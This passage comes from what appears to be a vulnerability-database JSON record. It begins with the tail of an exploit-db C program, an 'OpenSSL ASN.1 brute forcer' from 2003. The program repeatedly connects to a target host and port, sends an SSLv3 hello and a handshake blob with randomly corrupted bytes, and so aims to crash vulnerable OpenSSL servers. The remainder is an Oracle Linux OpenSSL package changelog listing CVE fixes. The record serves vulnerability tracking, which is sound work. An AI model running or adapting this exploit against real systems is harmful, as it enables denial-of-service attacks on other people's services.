\r\n\"\\x16\\x03\\x00\\x02\\x47\\x0b\\x00\\x02\\x43\\x00\\x02\\x40\\x00\\x02\\x3d\\x30\\x82\"\r\n\"\\x02\\x39\\x30\\x82\\x01\\xa2\\xa0\\x03\\x02\\x01\\x02\\x02\\x01\\x00\\x30\\x0d\\x06\"\r\n\"\\x09\\x2a\\x86\\x48\\x86\\xf7\\x0d\\x01\\x01\\x04\\x05\\x00\\x30\\x57\\x31\\x0b\\x30\"\r\n\"\\x09\\x06\\x03\\x55\\x04\\x06\\x13\\x02\\x50\\x4c\\x31\\x13\\x30\\x11\\x06\\x03\\x55\"\r\n\"\\x04\\x08\\x13\\x0a\\x53\\x6f\\x6d\\x65\\x2d\\x53\\x74\\x61\\x74\\x65\\x31\\x1f\\x30\"\r\n\"\\x1d\\x06\\x03\\x55\\x04\\x0a\\x13\\x16\\x53\\x74\\x75\\x6e\\x6e\\x65\\x6c\\x20\\x44\"\r\n\"\\x65\\x76\\x65\\x6c\\x6f\\x70\\x65\\x72\\x73\\x20\\x4c\\x74\\x64\\x31\\x12\\x30\\x10\"\r\n\"\\x06\\x03\\x55\\x04\\x03\\x13\\x09\\x6c\\x6f\\x63\\x61\\x6c\\x68\\x6f\\x73\\x74\\x30\"\r\n\"\\x1e\\x17\\x0d\\x30\\x33\\x30\\x36\\x31\\x32\\x32\\x33\\x35\\x30\\x34\\x39\\x5a\\x17\"\r\n\"\\x0d\\x30\\x34\\x30\\x36\\x31\\x31\\x32\\x33\\x35\\x30\\x34\\x39\\x5a\\x30\\x57\\x31\"\r\n\"\\x0b\\x30\\x09\\x06\\x03\\x55\\x04\\x06\\x13\\x02\\x50\\x4c\\x31\\x13\\x30\\x11\\x06\"\r\n\"\\x03\\x55\\x04\\x08\\x13\\x0a\\x53\\x6f\\x6d\\x65\\x2d\\x53\\x74\\x61\\x74\\x65\\x31\"\r\n\"\\x1f\\x30\\x1d\\x06\\x03\\x55\\x04\\x0a\\x13\\x16\\x53\\x74\\x75\\x6e\\x6e\\x65\\x6c\"\r\n\"\\x20\\x44\\x65\\x76\\x65\\x6c\\x6f\\x70\\x65\\x72\\x73\\x20\\x4c\\x74\\x64\\x31\\x12\"\r\n\"\\x30\\x10\\x06\\x03\\x55\\x04\\x03\\x13\\x09\\x6c\\x6f\\x63\\x61\\x6c\\x68\\x6f\\x73\"\r\n\"\\x74\\x30\\x81\\x9f\\x30\\x0d\\x06\\x09\\x2a\\x86\\x48\\x86\\xf7\\x0d\\x01\\x01\\x01\"\r\n\"\\x05\\x00\\x03\\x81\\x8d\\x00\\x30\\x81\\x89\\x02\\x81\\x81\\x00\\xe6\\x95\\x5c\\xc0\"\r\n\"\\xcb\\x03\\x78\\xf1\\x1e\\xaa\\x45\\xb7\\xa4\\x10\\xd0\\xc1\\xd5\\xc3\\x8c\\xcc\\xca\"\r\n\"\\x17\\x7b\\x48\\x9a\\x21\\xf2\\xfa\\xc3\\x25\\x07\\x0b\\xb7\\x69\\x17\\xca\\x59\\xf7\"\r\n\"\\xdf\\x67\\x7b\\xf1\\x72\\xd5\\x05\\x61\\x73\\xe8\\x70\\xbf\\xb9\\xfa\\xc8\\x4b\\x03\"\r\n\"\\x41\\x62\\x71\\xf9\\xf5\\x4e\\x28\\xb8\\x3b\\xe4\\x33\\x76\\x47\\xcc\\x1e\\x04\\x71\"\r\n\"\\xda\\xc4\\x0b\\x05\\x46\\xf4\\x52\\x72\\x99\\x43\\x36\\xf7\\x37\\x6d\\x04\\x1c\\x7a\"\r\n\"\\xde\\x2a\\x0c\\x45\\x4a\\xb6\\x48\\x33\\x3a\\xad\\xec\\x16\\xcc\\xe7\\x99\\x58\\xfd\"\r\n\"\\xef\\x4c\\xc6\\xdd\\x39\\x76\\xb6\\x50\\x76\\x2a\\x7d\\xa0\\x20\\xee\\xb4\\x2c\\xe0\"\r\n\"\\xd2\\xc9\\xa1\\x2e\\x31\\x02\\x03\\x01\\x00\\x01\\xa3\\x15\\x30\\x13\\x30\\x11\\x06\"\r\n\"\\x09\\x60\\x86\\x48\\x01\\x86\\xf8\\x42\\x01\\x01\\x04\\x04\\x03\\x02\\x06\\x40\\x30\"\r\n\"\\x0d\\x06\\x09\\x2a\\x86\\x48\\x86\\xf7\\x0d\\x01\\x01\\x04\\x05\\x00\\x03\\x81\\x81\"\r\n\"\\x00\\x9f\\xff\\xa9\\x93\\x70\\xb9\\xae\\x48\\x47\\x09\\xa1\\x11\\xbf\\x01\\x34\\xbf\"\r\n\"\\x1f\\x1e\\xed\\x88\\x3e\\x57\\xe0\\x37\\x72\\x0d\\xec\\xc7\\x21\\x44\\x12\\x99\\x3a\"\r\n\"\\xfa\\xaf\\x79\\x57\\xf4\\x7f\\x99\\x68\\x37\\xb1\\x17\\x83\\xd3\\x51\\x44\\xbd\\x50\"\r\n\"\\x67\\xf8\\xd6\\xd0\\x93\\x00\\xbb\\x53\\x3d\\xe2\\x3d\\x34\\xfc\\xed\\x60\\x85\\xea\"\r\n\"\\x67\\x7f\\x91\\xec\\xfa\\xe3\\xd8\\x78\\xa2\\xf4\\x61\\xfa\\x77\\xa3\\x3f\\xe4\\xb1\"\r\n\"\\x41\\x95\\x47\\x23\\x03\\x1c\\xbf\\x2e\\x40\\x77\\x82\\xef\\xa0\\x17\\x82\\x85\\x03\"\r\n\"\\x90\\x35\\x4e\\x85\\x0d\\x0f\\x4d\\xea\\x16\\xf5\\xce\\x15\\x21\\x10\\xf9\\x56\\xd0\"\r\n\"\\xa9\\x08\\xe5\\xf9\\x9d\\x5c\\x43\\x75\\x33\\xe2\\x16\\x03\\x00\\x00\\x84\\x10\\x00\"\r\n\"\\x00\\x80\\x6e\\xe4\\x26\\x03\\x97\\xb4\\x5d\\x58\\x70\\x36\\x98\\x31\\x62\\xd4\\xef\"\r\n\"\\x7b\\x4e\\x53\\x99\\xad\\x72\\x27\\xaf\\x05\\xd4\\xc9\\x89\\xca\\x04\\xf1\\x24\\xa4\"\r\n\"\\xa3\\x82\\xb5\\x89\\x3a\\x2e\\x8f\\x3f\\xf3\\xe1\\x7e\\x52\\x11\\xb2\\xf2\\x29\\x95\"\r\n\"\\xe0\\xb0\\xe9\\x3f\\x29\\xaf\\xc1\\xcd\\x77\\x54\\x6a\\xeb\\xf6\\x81\\x6b\\xd5\\xd6\"\r\n\"\\x0a\\x3d\\xc3\\xff\\x6f\\x76\\x4a\\xf7\\xc9\\x61\\x9f\\x7b\\xb3\\x25\\xe0\\x2b\\x09\"\r\n\"\\x53\\xcf\\x06\\x1c\\x82\\x9c\\x48\\x37\\xfa\\x71\\x27\\x97\\xec\\xae\\x6f\\x4f\\x75\"\r\n\"\\xb1\\xa5\\x84\\x99\\xf5\\xed\\x8c\\xba\\x0f\\xd5\\x33\\x31\\x61\\x5d\\x95\\x77\\x65\"\r\n\"\\x8d\\x89\\x0c\\x7d\\xa7\\xa8\\x95\\x5a\\xc7\\xb8\\x35\\x16\\x03\\x00\\x00\\x86\\x0f\"\r\n\"\\x00\\x00\\x82\\x00\\x80\\x78\\x1d\\xbd\\x86\\xcb\\x6e\\x06\\x88\\x57\\x9e\\x3d\\x21\"\r\n\"\\x7e\\xca\\xd1\\x75\\xff\\x33\\xef\\x48\\x4d\\x88\\x96\\x84\\x8c\\x2f\\xfb\\x92\\x1d\"\r\n\"\\x15\\x28\\xef\\xe0\\xd3\\x4d\\x20\\xe9\\xae\\x6c\\x5c\\xed\\x46\\xc0\\xef\\x4e\\xb4\"\r\n\"\\xe4\\xcf\\xe9\\x73\\xb8\\xd2\\x8b\\xe6\\x5e\\xb9\\x0c\\x67\\xbe\\x17\\x13\\x31\\x3f\"\r\n\"\\xe5\\xe1\\x9a\\x2d\\xfe\\xb4\\xd6\\xdb\\x8f\\xbc\\x15\\x22\\x10\\x65\\xe1\\xad\\x5f\"\r\n\"\\x00\\xd0\\x48\\x8d\\x4e\\xa7\\x08\\xbd\\x5c\\x40\\x77\\xb8\\xa9\\xbe\\x58\\xb0\\x15\"\r\n\"\\xd2\\x4c\\xc8\\xa1\\x79\\x63\\x25\\xeb\\xa1\\x32\\x61\\x3b\\x49\\x82\\xf1\\x3a\\x70\"\r\n\"\\x80\\xf8\\xdc\\xf7\\xf9\\xfc\\x50\\xc7\\xa2\\x5d\\xe4\\x30\\x8e\\x09\\x14\\x03\\x00\"\r\n\"\\x00\\x01\\x01\\x16\\x03\\x00\\x00\\x40\\xfe\\xc2\\x1f\\x94\\x7e\\xf3\\x0b\\xd1\\xe1\"\r\n\"\\x5c\\x27\\x34\\x7f\\x01\\xe9\\x51\\xd3\\x18\\x33\\x9a\\x99\\x48\\x6e\\x13\\x6f\\x82\"\r\n\"\\xb2\\x2c\\xa5\\x7b\\x36\\x5d\\x85\\xf5\\x17\\xe3\\x4f\\x2a\\x04\\x15\\x2d\\x0e\\x2f\"\r\n\"\\x2c\\xf9\\x1c\\xf8\\x9e\\xac\\xd5\\x6c\\x20\\x81\\xe5\\x22\\x54\\xf1\\xe1\\xd0\\xfd\"\r\n\"\\x64\\x42\\xfb\\x34\";\r\n\r\n#define CRAPLEN (sizeof(dacrap)-1)\r\n\r\n\r\nint send_hello()\r\n{\r\nint len;\r\nchar *p = buf;\r\n\t*p++ = 22;\t\t\t\t/* Handshake */\r\n\tPUTSHORT(0x0300, p);\t/* SSL v3 */\r\n\tPUTSHORT(85, p);\t\t/* Length will be 85 bytes */\r\n\t\r\n\t*p++ = 1;\t\t\t\t/* Client hello */\r\n\r\n\t*p++ = 0;\t\t\t\t/* Length: */\r\n\tPUTSHORT(81, p);\t\t/* 81 bytes */\r\n\r\n\tPUTSHORT(0x0300, p);\t/* SSL v3 */\r\n\tPUTLONG(0xffffffff, p);\t/* Random.gmt_unix_time */\r\n\r\n\t/* Now 28 bytes of random data... (7x4bytes=28) */\r\n\tPUTLONG(0x11223344, p);\r\n\tPUTLONG(0x11223344, p);\r\n\tPUTLONG(0x11223344, p);\r\n\tPUTLONG(0x11223344, p);\r\n\tPUTLONG(0x11223344, p);\r\n\tPUTLONG(0x11223344, p);\r\n\tPUTLONG(0x11223344, p);\r\n\r\n\t*p++ = 0;\t\t\t\t/* Session ID 0 */\r\n\t\r\n\tPUTSHORT(42, p);\t\t/* Cipher Suites Length */\r\n\tPUTSHORT(0x16, p);\r\n\tPUTSHORT(0x13, p);\r\n\tPUTSHORT(0x0a, p);\r\n\tPUTSHORT(0x66, p);\r\n\tPUTSHORT(0x07, p);\r\n\tPUTSHORT(0x05, p);\r\n\tPUTSHORT(0x04, p);\r\n\tPUTSHORT(0x65, p);\r\n\tPUTSHORT(0x64, p);\r\n\tPUTSHORT(0x63, p);\r\n\tPUTSHORT(0x62, p);\r\n\tPUTSHORT(0x61, p);\r\n\tPUTSHORT(0x60, p);\r\n\tPUTSHORT(0x15, p);\r\n\tPUTSHORT(0x12, p);\r\n\tPUTSHORT(0x09, p);\r\n\tPUTSHORT(0x14, p);\r\n\tPUTSHORT(0x11, p);\r\n\tPUTSHORT(0x08, p);\r\n\tPUTSHORT(0x06, p);\r\n\tPUTSHORT(0x03, p);\r\n\r\n\t*p++ = 1;\t\t\t\t/* Compresion method length: 1 */\r\n\t*p++ = 0;\t\t\t\t/* (null) */\r\n\r\n\tlen = p - buf;\r\n\treturn len;\r\n}\r\n\r\nint send_crap()\r\n{\r\n\tmemcpy(buf, dacrap, CRAPLEN);\r\n\treturn CRAPLEN;\r\n}\r\n\r\n\r\n\r\nvoid corruptor(char *buf, int len)\r\n{\r\nint cb, i, l;\r\n\r\n\tcb = rand()%15+1; /* bytes to corrupt */\r\n\r\n\tfor (i=0; i < cb; i++)\r\n\t{\r\n\t\tl = rand()%len;\r\n\t\tbuf[l] = rand()%256;\r\n\t}\r\n}\r\n\r\nvoid diffit()\r\n{\r\nint i;\r\n\tprintf(\"DIFF:\\n\");\r\n\tfor (i=0; i < CRAPLEN; i++)\r\n\t{\r\n\t\tif (buf[i] != dacrap[i])\r\n\t\t\tprintf(\"Offset %d: 0x%x -> 0x%x\\n\", i, dacrap[i], buf[i]);\r\n\t}\r\n\tprintf(\"*****\\n\");\r\n}\r\n\r\n\r\nint main(int argc, char *argv[])\r\n{\r\n\tstruct sockaddr_in addr;\r\n\tint s, port = 0, first = 1, len;\r\n\tchar *host = NULL;\r\n\tunsigned int seed;\r\n\tstruct timeval tv;\r\n\r\n\tprintf(\"OpenSSL ASN.1 brute forcer (Syzop/2003)\\n\\n\");\r\n\t\r\n\tif (argc != 3) {\r\n\t\tfprintf(stderr, \"Use: %s [ip] [port]\\n\", argv[0]);\r\n\t\texit(1);\r\n\t}\r\n\r\n\thost = argv[1];\r\n\tport = atoi(argv[2]);\r\n\tif ((port < 1) || (port > 65535)) {\r\n\t\tfprintf(stderr, \"Port out of range (%d)\\n\", port);\r\n\t\texit(1);\r\n\t}\r\n\r\n\tgettimeofday(&tv, NULL);\r\n\tseed = (getpid() ^ tv.tv_sec) + (tv.tv_usec * 1000);\r\n\r\n\tprintf(\"seed = %u\\n\", seed);\r\n\tsrand(seed);\r\n\r\n\tmemset(&addr, 0, sizeof(addr));\r\n\r\n\r\n\tsignal(SIGPIPE, SIG_IGN); /* Ignore SIGPIPE */\r\n\r\nwhile(1)\r\n{\r\n\r\n\tif ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {\r\n\t\tfprintf(stderr, \"Socket error: %s\\n\", strerror(errno));\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\taddr.sin_family = AF_INET;\r\n\taddr.sin_port = htons(port);\r\n\taddr.sin_addr.s_addr = inet_addr(host);\r\n\tif (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {\r\n\t\tfprintf(stderr, \"Unable to connect: %s\\n\", strerror(errno));\r\n\t\tif (!first)\r\n\t\t\tdiffit();\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tfirst = 0;\r\n\tprintf(\".\"); fflush(stdout);\r\n\r\n\tlen = send_hello();\r\n\twrite(s, buf, len);\r\n\tlen = send_crap();\r\n\tcorruptor(buf, len);\r\n\twrite(s, buf, len);\r\n\tusleep(1000); /* wait.. */\r\n\tclose(s);\r\n}\r\n\t\r\n\texit(EXIT_SUCCESS);\r\n}\r\n\r\n\r\n\r\n// milw0rm.com [2004-01-21]", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/146/"}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:11", "bulletinFamily": "unix", "cvelist": ["CVE-2013-0166", "CVE-2012-2333", "CVE-2006-3738", "CVE-2009-1379", "CVE-2006-2940", "CVE-2006-2937", "CVE-2007-4995", "CVE-2011-4108", "CVE-2009-1377", "CVE-2013-0169", "CVE-2015-0286", "CVE-2013-6449", "CVE-2006-4343", "CVE-2003-0544", "CVE-2007-3108", "CVE-2003-0543", "CVE-2011-4576", "CVE-2003-0545", "CVE-2005-2946", "CVE-2005-2969", "CVE-2006-4339", "CVE-2004-0112", "CVE-2015-0288", "CVE-2009-4355", "CVE-2012-1165", "CVE-2011-4577", "CVE-2014-0224", "CVE-2010-0742", "CVE-2008-0891", "CVE-2004-0975", "CVE-2011-4619", "CVE-2003-0131", "CVE-2004-0079", "CVE-2007-5135", "CVE-2011-0014", "CVE-2009-1378", "CVE-2014-3470", "CVE-2012-4929", "CVE-2013-6450", "CVE-2012-0050", "CVE-2009-3555", "CVE-2010-1633", "CVE-2015-0293", "CVE-2010-5298", "CVE-2014-0160", "CVE-2013-4353", "CVE-2008-1672", "CVE-2014-0195", "CVE-2014-0198", "CVE-2015-0209", "CVE-2012-2110", "CVE-2012-0884", "CVE-2010-3864", "CVE-2005-0109", "CVE-2015-0287", "CVE-2011-3207", "CVE-2015-0289", "CVE-2015-0292", "CVE-2003-0078", "CVE-2003-0147", "CVE-2014-0221"], "description": "[1.0.1m-2.0.1]\n- update to upstream 1.0.1m\n- update to fips canister 2.0.9\n- regenerated below patches\n openssl-1.0.1-beta2-rpmbuild.patch\n openssl-1.0.1m-rhcompat.patch\n openssl-1.0.1m-ecc-suiteb.patch\n openssl-1.0.1m-fips-mode.patch\n openssl-1.0.1m-version.patch\n openssl-1.0.1m-evp-devel.patch\n[1.0.1j-2.0.4]\n- [Orabug 20182267] The openssl-fips-devel package should Provide:\n openssl-devel and openssl-devel(x86-64) like the standard -devel\n package\n- The openssl-fips-devel package should include fips.h and fips_rand.h\n for apps that want to build against FIPS* APIs\n[1.0.1j-2.0.3]\n- [Orabug 20086847] reintroduce patch openssl-1.0.1e-ecc-suiteb.patch,\n update ec_curve.c which gets copied into build tree to match the patch\n (ie only have curves which are advertised). The change items from the\n orignal patch are as follows:\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1j-2.0.2]\n- update README.FIPS with step-by-step install instructions\n[1.0.1j-2.0.1]\n- update to upstream 1.0.1j\n- change name to openssl-fips\n- change Obsoletes: openssl to Conflicts: openssl\n- add Provides: openssl\n[1.0.1i-2.0.3.fips]\n- update to fips canister 2.0.8 to remove Dual EC DRBG\n- run gcc -v so the gcc build version is captured in the build log\n[1.0.1i-2.0.2.fips]\n- flip EVP_CIPH_* flag bits for compatibility with original RH patched pkg\n[1.0.1i-2.0.1.fips]\n- build against upstream 1.0.1i\n- build against fips validated canister 2.0.7\n- add patch to support fips=1\n- rename pkg to openssl-fips and Obsolete openssl\n[1.0.1e-16.14]\n- fix CVE-2010-5298 - possible use of memory after free\n- fix CVE-2014-0195 - buffer overflow via invalid DTLS fragment\n- fix CVE-2014-0198 - possible NULL pointer dereference\n- fix CVE-2014-0221 - DoS from invalid DTLS handshake packet\n- fix CVE-2014-0224 - SSL/TLS MITM vulnerability\n- fix CVE-2014-3470 - client-side DoS when using anonymous ECDH\n[1.0.1e-16.7]\n- fix CVE-2014-0160 - information disclosure in TLS heartbeat extension\n[1.0.1e-16.4]\n- fix CVE-2013-4353 - Invalid TLS handshake crash\n[1.0.1e-16.3]\n- fix CVE-2013-6450 - possible MiTM attack on DTLS1\n[1.0.1e-16.2]\n- fix CVE-2013-6449 - crash when version in SSL structure is incorrect\n[1.0.1e-16.1]\n- add back some no-op symbols that were inadvertently dropped\n[1.0.1e-16]\n- do not advertise ECC curves we do not support\n- fix CPU identification on Cyrix CPUs\n[1.0.1e-15]\n- make DTLS1 work in FIPS mode\n- avoid RSA and DSA 512 bits and Whirlpool in 'openssl speed' in FIPS mode\n[1.0.1e-14]\n- installation of dracut-fips marks that the FIPS module is installed\n[1.0.1e-13]\n- avoid dlopening libssl.so from libcrypto\n[1.0.1e-12]\n- fix small memory leak in FIPS aes selftest\n- fix segfault in openssl speed hmac in the FIPS mode\n[1.0.1e-11]\n- document the nextprotoneg option in manual pages\n original patch by Hubert Kario\n[1.0.1e-9]\n- always perform the FIPS selftests in library constructor\n if FIPS module is installed\n[1.0.1e-8]\n- fix use of rdrand if available\n- more commits cherry picked from upstream\n- documentation fixes\n[1.0.1e-7]\n- additional manual page fix\n- use symbol versioning also for the textual version\n[1.0.1e-6]\n- additional manual page fixes\n- cleanup speed command output for ECDH ECDSA\n[1.0.1e-5]\n- use _prefix macro\n[1.0.1e-4]\n- add relro linking flag\n[1.0.1e-2]\n- add support for the -trusted_first option for certificate chain verification\n[1.0.1e-1]\n- rebase to the 1.0.1e upstream version\n[1.0.0-28]\n- fix for CVE-2013-0169 - SSL/TLS CBC timing attack (#907589)\n- fix for CVE-2013-0166 - DoS in OCSP signatures checking (#908052)\n- enable compression only if explicitly asked for or OPENSSL_DEFAULT_ZLIB\n environment variable is set (fixes CVE-2012-4929 #857051)\n- use __secure_getenv() everywhere instead of getenv() (#839735)\n[1.0.0-27]\n- fix sslrand(1) and sslpasswd(1) reference in openssl(1) manpage (#841645)\n- drop superfluous lib64 fixup in pkgconfig .pc files (#770872)\n- force BIO_accept_new(*:\n) to listen on IPv4\n[1.0.0-26]\n- use PKCS#8 when writing private keys in FIPS mode as the old\n PEM encryption mode is not FIPS compatible (#812348)\n[1.0.0-25]\n- fix for CVE-2012-2333 - improper checking for record length in DTLS (#820686)\n- properly initialize tkeylen in the CVE-2012-0884 fix\n[1.0.0-24]\n- fix for CVE-2012-2110 - memory corruption in asn1_d2i_read_bio() (#814185)\n[1.0.0-23]\n- fix problem with the SGC restart patch that might terminate handshake\n incorrectly\n- fix for CVE-2012-0884 - MMA weakness in CMS and PKCS#7 code (#802725)\n- fix for CVE-2012-1165 - NULL read dereference on bad MIME headers (#802489)\n[1.0.0-22]\n- fix incorrect encryption of unaligned chunks in CFB, OFB and CTR modes\n[1.0.0-21]\n- fix for CVE-2011-4108 & CVE-2012-0050 - DTLS plaintext recovery\n vulnerability and additional DTLS fixes (#771770)\n- fix for CVE-2011-4576 - uninitialized SSL 3.0 padding (#771775)\n- fix for CVE-2011-4577 - possible DoS through malformed RFC 3779 data (#771778)\n- fix for CVE-2011-4619 - SGC restart DoS attack (#771780)\n[1.0.0-20]\n- fix x86cpuid.pl - patch by Paolo Bonzini\n[1.0.0-19]\n- add known answer test for SHA2 algorithms\n[1.0.0-18]\n- fix missing initialization of a variable in the CHIL engine (#740188)\n[1.0.0-17]\n- initialize the X509_STORE_CTX properly for CRL lookups - CVE-2011-3207\n (#736087)\n[1.0.0-16]\n- merge the optimizations for AES-NI, SHA1, and RC4 from the intelx\n engine to the internal implementations\n[1.0.0-15]\n- better documentation of the available digests in apps (#693858)\n- backported CHIL engine fixes (#693863)\n- allow testing build without downstream patches (#708511)\n- enable partial RELRO when linking (#723994)\n- add intelx engine with improved performance on new Intel CPUs\n- add OPENSSL_DISABLE_AES_NI environment variable which disables\n the AES-NI support (does not affect the intelx engine)\n[1.0.0-14]\n- use the AES-NI engine in the FIPS mode\n[1.0.0-11]\n- add API necessary for CAVS testing of the new DSA parameter generation\n[1.0.0-10]\n- fix OCSP stapling vulnerability - CVE-2011-0014 (#676063)\n- correct the README.FIPS document\n[1.0.0-8]\n- add -x931 parameter to openssl genrsa command to use the ANSI X9.31\n key generation method\n- use FIPS-186-3 method for DSA parameter generation\n- add OPENSSL_FIPS_NON_APPROVED_MD5_ALLOW environment variable\n to allow using MD5 when the system is in the maintenance state\n even if the /proc fips flag is on\n- make openssl pkcs12 command work by default in the FIPS mode\n[1.0.0-7]\n- listen on ipv6 wildcard in s_server so we accept connections\n from both ipv4 and ipv6 (#601612)\n- fix openssl speed command so it can be used in the FIPS mode\n with FIPS allowed ciphers (#619762)\n[1.0.0-6]\n- disable code for SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG - CVE-2010-3864\n (#649304)\n[1.0.0-5]\n- fix race in extension parsing code - CVE-2010-3864 (#649304)\n[1.0.0-4]\n- openssl man page fix (#609484)\n[1.0.0-3]\n- fix wrong ASN.1 definition of OriginatorInfo - CVE-2010-0742 (#598738)\n- fix information leak in rsa_verify_recover - CVE-2010-1633 (#598732)\n[1.0.0-2]\n- make CA dir readable - the private keys are in private subdir (#584810)\n- a few fixes from upstream CVS\n- make X509_NAME_hash_old work in FIPS mode (#568395)\n[1.0.0-1]\n- update to final 1.0.0 upstream release\n[1.0.0-0.22.beta5]\n- make TLS work in the FIPS mode\n[1.0.0-0.21.beta5]\n- gracefully handle zero length in assembler implementations of\n OPENSSL_cleanse (#564029)\n- do not fail in s_server if client hostname not resolvable (#561260)\n[1.0.0-0.20.beta5]\n- new upstream release\n[1.0.0-0.19.beta4]\n- fix CVE-2009-4355 - leak in applications incorrectly calling\n CRYPTO_free_all_ex_data() before application exit (#546707)\n- upstream fix for future TLS protocol version handling\n[1.0.0-0.18.beta4]\n- add support for Intel AES-NI\n[1.0.0-0.17.beta4]\n- upstream fix compression handling on session resumption\n- various null checks and other small fixes from upstream\n- upstream changes for the renegotiation info according to the latest draft\n[1.0.0-0.16.beta4]\n- fix non-fips mingw build (patch by Kalev Lember)\n- add IPV6 fix for DTLS\n[1.0.0-0.15.beta4]\n- add better error reporting for the unsafe renegotiation\n[1.0.0-0.14.beta4]\n- fix build on s390x\n[1.0.0-0.13.beta4]\n- disable enforcement of the renegotiation extension on the client (#537962)\n- add fixes from the current upstream snapshot\n[1.0.0-0.12.beta4]\n- keep the beta status in version number at 3 so we do not have to rebuild\n openssh and possibly other dependencies with too strict version check\n[1.0.0-0.11.beta4]\n- update to new upstream version, no soname bump needed\n- fix CVE-2009-3555 - note that the fix is bypassed if SSL_OP_ALL is used\n so the compatibility with unfixed clients is not broken. The\n protocol extension is also not final.\n[1.0.0-0.10.beta3]\n- fix use of freed memory if SSL_CTX_free() is called before\n SSL_free() (#521342)\n[1.0.0-0.9.beta3]\n- fix typo in DTLS1 code (#527015)\n- fix leak in error handling of d2i_SSL_SESSION()\n[1.0.0-0.8.beta3]\n- fix RSA and DSA FIPS selftests\n- reenable fixed x86_64 camellia assembler code (#521127)\n[1.0.0-0.7.beta3]\n- temporarily disable x86_64 camellia assembler code (#521127)\n[1.0.0-0.6.beta3]\n- fix openssl dgst -dss1 (#520152)\n[1.0.0-0.5.beta3]\n- drop the compat symlink hacks\n[1.0.0-0.4.beta3]\n- constify SSL_CIPHER_description()\n[1.0.0-0.3.beta3]\n- fix WWW:Curl:Easy reference in tsget\n[1.0.0-0.2.beta3]\n- enable MD-2\n[1.0.0-0.1.beta3]\n- update to new major upstream release\n[0.9.8k-7]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_12_Mass_Rebuild\n* Wed Jul 22 2009 Bill Nottingham \n- do not build special 'optimized' versions for i686, as that's the base\n arch in Fedora now\n[0.9.8k-6]\n- abort if selftests failed and random number generator is polled\n- mention EVP_aes and EVP_sha2xx routines in the manpages\n- add README.FIPS\n- make CA dir absolute path (#445344)\n- change default length for RSA key generation to 2048 (#484101)\n[0.9.8k-5]\n- fix CVE-2009-1377 CVE-2009-1378 CVE-2009-1379\n (DTLS DoS problems) (#501253, #501254, #501572)\n[0.9.8k-4]\n- support compatibility DTLS mode for CISCO AnyConnect (#464629)\n[0.9.8k-3]\n- correct the SHLIB_VERSION define\n[0.9.8k-2]\n- add support for multiple CRLs with same subject\n- load only dynamic engine support in FIPS mode\n[0.9.8k-1]\n- update to new upstream release (minor bug fixes, security\n fixes and machine code optimizations only)\n[0.9.8j-10]\n- move libraries to /usr/lib (#239375)\n[0.9.8j-9]\n- add a static subpackage\n[0.9.8j-8]\n- Rebuilt for https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n[0.9.8j-7]\n- must also verify checksum of libssl.so in the FIPS mode\n- obtain the seed for FIPS rng directly from the kernel device\n- drop the temporary symlinks\n[0.9.8j-6]\n- drop the temporary triggerpostun and symlinking in post\n- fix the pkgconfig files and drop the unnecessary buildrequires\n on pkgconfig as it is a rpmbuild dependency (#481419)\n[0.9.8j-5]\n- add temporary triggerpostun to reinstate the symlinks\n[0.9.8j-4]\n- no pairwise key tests in non-fips mode (#479817)\n[0.9.8j-3]\n- even more robust test for the temporary symlinks\n[0.9.8j-2]\n- try to ensure the temporary symlinks exist\n[0.9.8j-1]\n- new upstream version with necessary soname bump (#455753)\n- temporarily provide symlink to old soname to make it possible to rebuild\n the dependent packages in rawhide\n- add eap-fast support (#428181)\n- add possibility to disable zlib by setting\n- add fips mode support for testing purposes\n- do not null dereference on some invalid smime files\n- add buildrequires pkgconfig (#479493)\n[0.9.8g-11]\n- do not add tls extensions to server hello for SSLv3 either\n[0.9.8g-10]\n- move root CA bundle to ca-certificates package\n[0.9.8g-9]\n- fix CVE-2008-0891 - server name extension crash (#448492)\n- fix CVE-2008-1672 - server key exchange message omit crash (#448495)\n[0.9.8g-8]\n- super-H arch support\n- drop workaround for bug 199604 as it should be fixed in gcc-4.3\n[0.9.8g-7]\n- sparc handling\n[0.9.8g-6]\n- update to new root CA bundle from mozilla.org (r1.45)\n[0.9.8g-5]\n- Autorebuild for GCC 4.3\n[0.9.8g-4]\n- merge review fixes (#226220)\n- adjust the SHLIB_VERSION_NUMBER to reflect library name (#429846)\n[0.9.8g-3]\n- set default paths when no explicit paths are set (#418771)\n- do not add tls extensions to client hello for SSLv3 (#422081)\n[0.9.8g-2]\n- enable some new crypto algorithms and features\n- add some more important bug fixes from openssl CVS\n[0.9.8g-1]\n- update to latest upstream release, SONAME bumped to 7\n[0.9.8b-17]\n- update to new CA bundle from mozilla.org\n[0.9.8b-16]\n- fix CVE-2007-5135 - off-by-one in SSL_get_shared_ciphers (#309801)\n- fix CVE-2007-4995 - out of order DTLS fragments buffer overflow (#321191)\n- add alpha sub-archs (#296031)\n[0.9.8b-15]\n- rebuild\n[0.9.8b-14]\n- use localhost in testsuite, hopefully fixes slow build in koji\n- CVE-2007-3108 - fix side channel attack on private keys (#250577)\n- make ssl session cache id matching strict (#233599)\n[0.9.8b-13]\n- allow building on ARM architectures (#245417)\n- use reference timestamps to prevent multilib conflicts (#218064)\n- -devel package must require pkgconfig (#241031)\n[0.9.8b-12]\n- detect duplicates in add_dir properly (#206346)\n[0.9.8b-11]\n- the previous change still didn't make X509_NAME_cmp transitive\n[0.9.8b-10]\n- make X509_NAME_cmp transitive otherwise certificate lookup\n is broken (#216050)\n[0.9.8b-9]\n- aliasing bug in engine loading, patch by IBM (#213216)\n[0.9.8b-8]\n- CVE-2006-2940 fix was incorrect (#208744)\n[0.9.8b-7]\n- fix CVE-2006-2937 - mishandled error on ASN.1 parsing (#207276)\n- fix CVE-2006-2940 - parasitic public keys DoS (#207274)\n- fix CVE-2006-3738 - buffer overflow in SSL_get_shared_ciphers (#206940)\n- fix CVE-2006-4343 - sslv2 client DoS (#206940)\n[0.9.8b-6]\n- fix CVE-2006-4339 - prevent attack on PKCS#1 v1.5 signatures 